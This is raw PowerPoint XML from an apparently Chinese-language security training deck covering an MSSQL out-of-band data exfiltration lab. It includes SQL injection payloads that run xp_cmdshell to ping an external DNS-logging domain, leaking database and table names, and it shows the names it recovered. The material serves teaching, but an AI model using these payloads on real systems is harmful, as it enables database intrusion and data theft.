            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>4、登录名与数据库用户在服务器级别是一对多的；在数据库级别是一对一的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414021" y="2655309"/>
            <a:ext cx="6433820" cy="492436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400" cap="flat">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="38100" dist="23000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="35000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="60957" tIns="60957" rIns="60957" bIns="60957" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr" forceAA="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>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400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020849"/>
            <a:ext cx="11232815" cy="24929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spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</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 altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3;declare @a varchar(1024);set @a=(select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>);exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> "ping '%2b@a%2b'.akx7l0.log.saltor.icu"')--</a:t>
            </a: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第一个库名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>master</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7805A0E5-F56E-43A0-AA2F-96622A0E0A3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1984118" y="3143480"/>
            <a:ext cx="8362793" cy="3473939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259490970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itle 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134526" y="344564"/>
            <a:ext cx="3992057" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="40404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sz="2400" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据外带实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487E1F69-2B83-5349-BE73-54F0A131B221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549109" y="1020850"/>
            <a:ext cx="11232815" cy="24929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t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>MSSql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="477588" indent="-304792" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>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注入测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="719982" indent="-307192" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>http://172.16.12.2/info.aspx?id=3;declare @a varchar(1024);set @a=(select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>);exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> "ping '%2b@a%2b'.akx7l0.log.saltor.icu"')--</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>第一个表名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>DB_AnswerAgree</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412790" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="267"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{071E25A3-189B-4D68-BA8D-6B01ECEB2799}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2455538" y="3127713"/>
            <a:ext cx="7280925" cy="3385631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16810250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标题 200705"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thank you</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6569075" y="5391150"/>
            <a:ext cx="3663950" cy="677863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>易启学智能化教育领导者</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>易启学良心做教育</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="椭圆 25"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="2832100"/>
            <a:ext cx="1319213" cy="1319213"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="椭圆 27"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4525963" y="3538538"/>
            <a:ext cx="1349375" cy="1349375"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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1800" b="1" noProof="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="椭圆 28"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5322888" y="2019300"/>
            <a:ext cx="1349375" cy="1350963"/>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1800" b="1" noProof="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6694488" y="2825750"/>
            <a:ext cx="1350962" cy="1349375"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">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1800" b="1" noProof="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="椭圆 31"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7253288" y="2074863"/>
            <a:ext cx="233362" cy="2317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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="椭圆 33"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4159250" y="2249488"/>
            <a:ext cx="276225" cy="2778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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="椭圆 35"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3333750" y="3382963"/>
            <a:ext cx="188913" cy="1905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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="椭圆 36"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3122613" y="2270125"/>
            <a:ext cx="77787" cy="76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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="椭圆 37"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2595563" y="3022600"/>
            <a:ext cx="76200" cy="76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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="椭圆 39"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3587750" y="4595813"/>
            <a:ext cx="190500" cy="1889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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="椭圆 40"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2841625" y="4176713"/>
            <a:ext cx="76200" cy="77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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="椭圆 42"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8421688" y="3536950"/>
            <a:ext cx="188912" cy="190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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="椭圆 43"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
